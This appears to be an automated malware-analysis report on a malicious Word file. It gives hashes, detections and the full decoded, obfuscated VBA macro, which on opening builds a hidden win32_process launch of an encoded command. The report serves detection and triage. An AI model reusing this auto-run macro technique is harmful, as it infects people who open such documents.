Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 df2f847e0ceb1e22…

MALICIOUS

Office (OOXML)

Size: 127.9 KB
Created: 2020-01-31 20:02:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-01-23
MD5: df45ca631cb98d355a4b0efcbd37bb8c
SHA-1: ae9ccde1b44a1dfa15ac4fc6819f42b9d0ba7a47
SHA-256: df2f847e0ceb1e22def02c6e08603ca76a6c264b4bd09a2345040cd597e55d34
Risk score: 232

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-7572364-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-7572364-0
  • VBA project inside OOXML [medium] OOXML_VBA (3 related findings)
    Document contains a VBA project — VBA macros present
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched line in script:
    Set Eonntaeoqm = GetObject(Qsbloagqxes)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8670 bytes
SHA-256: cd715d9390ee2519a89561c900dcfed4e634ad1a99bf75bcb28c7c5194254768
Detection
ClamAV: No threats found
Obfuscation or payload: likely
102 of 177 identifiers look randomly generated (e.g. 'Jyafpelcewptx') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Rmhpjcza"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   pl34 _
= "{TipTopPo}"
j3u = Oibkgqnfzwc + Gsravzah
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Iqsvexeheqe + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oxgacita)
ndko24 = "{TipTopPo}"
nsih6 = 125 + 142 + 588
akj3 = 970 + 926
kqkqn4 = (Zbbyadnkgt) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Unujiupxezqq
Zvgreixvf.Whwtmkbqxiz
End Sub


Attribute VB_Name = "Vzumvudwbpodi"
Attribute VB_Base = "0{316F8B58-5BC7-4EED-B2D8-7EB79C4541C6}{18236F7E-2130-4864-BBB6-F98C6A1B46E1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zvgreixvf"
Function Whwtmkbqxiz()
   pl34 _
= "{TipTopPo}"
j3u = Jxdjxpcnvsu + Qdasapohh
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Elrgfnxn + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Sfnnvupplw)
ndko24 = "{TipTopPo}"
nsih6 = 529 + 903 + 938
akj3 = 912 + 498
kqkqn4 = (Imycuypxib) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Emywiiuh
Vnhejylqm = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Vzumvudwbpodi.Daztbyqfh + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
   pl34 _
= "{TipTopPo}"
j3u = Bfcmhshp + Otxtrgmaq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cfrnogtlwlwz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Aifsymbkayjjj)
ndko24 = "{TipTopPo}"
nsih6 = 309 + 693 + 272
akj3 = 630 + 712
kqkqn4 = (Ygndhzak) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Lnekwsucvqyg
Qsbloagqxes = Nuvwrbnbvt(Vnhejylqm)
   pl34 _
= "{TipTopPo}"
j3u = Pqnyovdeoff + Jwxtentnw
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Renqygswyp + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Mweidhxtrhhea)
ndko24 = "{TipTopPo}"
nsih6 = 242 + 980 + 532
akj3 = 801 + 390
kqkqn4 = (Mlkdsjbhjimgh) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Vqrykwaep
Set Eonntaeoqm = GetObject(Qsbloagqxes)
   pl34 _
= "{TipTopPo}"
j3u = Ugcwrjouzg + Isltopnst
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ddhugatscyjmo + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wwdktbyopxpsp)
ndko24 = "{TipTopPo}"
nsih6 = 658 + 582 + 345
akj3 = 839 + 818
kqkqn4 = (Xrfjytkpi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Oziyfxqst
Qpiitproiikh = Vzumvudwbpodi.Lhyygyfp.Tag
   pl34 _
= "{TipTopPo}"
j3u = Gxfoqbglvto + Vavmwcca
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Vplymmjplys + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Cetvkacaakdo)
ndko24 = "{TipTopPo}"
nsih6 = 243 + 692 + 999
akj3 = 613 + 511
kqkqn4 = (Mnqxnnjjzfdty) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Cvkvgtid
Rqlponbfze = Qsbloagqxes + ChrW(Int(wdKeyS)) + Vzumvudwbpodi.Uniaeohk.Tag + Qpiitproiikh
   pl34 _
= "{TipTopPo}"
j3u = Qunksecvwepy + Djdyexkwaot
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzonixvgvbfkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oqbqhnhgvple)
ndko24 = "{TipTopPo}"
nsih6 = 107 + 987 + 376
akj3 = 331 + 724
kqkqn4 = (Tyrlhlwiqhak) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Iyochphkn
Tdqudfve = Rqlponbfze + Vzumvudwbpodi.Daztbyqfh
   pl34 _
= "{TipTopPo}"
j3u = Rbjquisuwlkak + Bjcujclefc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ikmcjmwz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ggmznmwm)
ndko24 = "{TipTopPo}"
nsih6 = 899 + 129 + 837
akj3 = 287 + 417
kqkqn4 = (Ceksrkbvgw) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gfjkkjanoqk
Set Jncttblcx = Yhhrqvocxju(Tdqudfve)
   pl34 _
= "{TipTopPo}"
j3u = Slpjohplqd + Vwkucgrr
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ljgivkughwzks + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ytcyzvbos)
ndko24 = "{TipTopPo}"
nsih6 = 764 + 807 + 153
akj3 = 379 + 789
kqkqn4 = (Bsnwhjqtagcgl) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kwedkezqdno
Call Eonntaeoqm. _
Create(NJ + Wxltifsded, Vjunmkck, Jncttblcx, Vcuippnnufu, Ukpdxpphjzh, Srinhkwaclwd)
   pl34 _
= "{TipTopPo}"
j3u = Ciuoiwlboa + Njkuorxxga
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ctzmqzzwxqfs + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qmhkspymfj)
ndko24 = "{TipTopPo}"
nsih6 = 445 + 609 + 816
akj3 = 294 + 783
kqkqn4 = (Mfnodcyampwzl) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Iowdrscb
End Function
Function Yhhrqvocxju(Docheoddz)
   pl34 _
= "{TipTopPo}"
j3u = Tyevpfcfqmq + Evxjlyqrtetgv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ovrdzpzg + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Uyocvsrryxe)
ndko24 = "{TipTopPo}"
nsih6 = 582 + 712 + 741
akj3 = 667 + 994
kqkqn4 = (Tcqyzulo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Bruvnzif
Set Yhhrqvocxju = GetObject(Docheoddz)
   pl34 _
= "{TipTopPo}"
j3u = Ymlsskyz + Tldqnwbqb
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Iizqnoiggwpht + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wsslyuesjxzli)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 93 + 182
akj3 = 615 + 631
kqkqn4 = (Jyafpelcewptx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ejjoajxp
Yhhrqvocxju. _
showwindow = Vaaljfvz + Hfuwimdnyxxve
   pl34 _
= "{TipTopPo}"
j3u = Avpsvvlavtdi + Nikjsukr
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Eykjobnkeqcc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ecnfmfwzzjtw)
ndko24 = "{TipTopPo}"
nsih6 = 193 + 271 + 922
akj3 = 175 + 951
kqkqn4 = (Gbiiiunxkcltf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jyksrfqgf
End Function
Function Nuvwrbnbvt(Qavebkkbbl)
   pl34 _
= "{TipTopPo}"
j3u = Arrubaqrfgl + Vvoxwpop
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ovgqtloejf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nzyxwsrut)
ndko24 = "{TipTopPo}"
nsih6 = 762 + 853 + 913
akj3 = 37 + 694
kqkqn4 = (Nytrullebfgd) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jwfqcbkdpioyy
Nuvwrbnbvt = Join$(Split(Qavebkkbbl, "/34//22/778//0//3/"), NoLineBreakAfter)
   pl34 _
= "{TipTopPo}"
j3u = Ukjxpjis + Jgwiiszcvsq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Yvynbkqtj + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oeizqxjyo)
ndko24 = "{TipTopPo}"
nsih6 = 17 + 631 + 677
akj3 = 777 + 131
kqkqn4 = (Wclqihemhm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Lcqvhiqu
End Function
Function Wxltifsded()
   pl34 _
= "{TipTopPo}"
j3u = Kjmlefsqtqjuk + Aefjuvdqy
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hncsrkwubb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Xqpvcasdixzf)
ndko24 = "{TipTopPo}"
nsih6 = 319 + 740 + 190
akj3 = 20 + 16
kqkqn4 = (Wmchtnwuxf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Yyypghpn
Kgzgcaciszpf = ChrW(Int(wdKeyP))
   pl34 _
= "{TipTopPo}"
j3u = Dtwywcmjhmwgm + Ipnzmgasejwub
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gcokrblzii + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Esscwnwix)
ndko24 = "{TipTopPo}"
nsih6 = 869 + 998 + 846
akj3 = 1 + 488
kqkqn4 = (Epcarozhlh) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Tsbbvxqer
Uyqerugunyuoz = Kgzgcaciszpf + Vzumvudwbpodi.Advbcgiqes.ControlTipText + "     -e      "
   pl34 _
= "{TipTopPo}"
j3u = Bubpotnqks + Fbbyhaevm
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qwpmwpvsvw + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zamqplztr)
ndko24 = "{TipTopPo}"
nsih6 = 572 + 391 + 483
akj3 = 346 + 786
kqkqn4 = (Fzqzumvkwzik) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Grbozjigwbyuk
sser = Vzumvudwbpodi.Pcujazwsmzi.Pages(0).Caption
   pl34 _
= "{TipTopPo}"
j3u = Sxjbkvml + Ehtykqsmkbig
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Phclekhpyove + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Axcqyjwionii)
ndko24 = "{TipTopPo}"
nsih6 = 852 + 24 + 470
akj3 = 490 + 968
kqkqn4 = (Lkularlc) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Hsmpjfdg
Wxltifsded = Nuvwrbnbvt(Uyqerugunyuoz + StrReverse(sser))
   pl34 _
= "{TipTopPo}"
j3u = Qvdxpzsnzqn + Xhvyxvav
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Stomnsags + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zsfmqcshtp)
ndko24 = "{TipTopPo}"
nsih6 = 458 + 262 + 748
akj3 = 315 + 529
kqkqn4 = (Eszgpeixvdpke) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Fuyjujqyoq
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 55296 bytes
SHA-256: 8e94925f2296a998167df60b5eeef6e1cfacaa8fb236bf1c6d27bf5527534dd5
Detection
ClamAV: Doc.Malware.Sagent-7572364-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).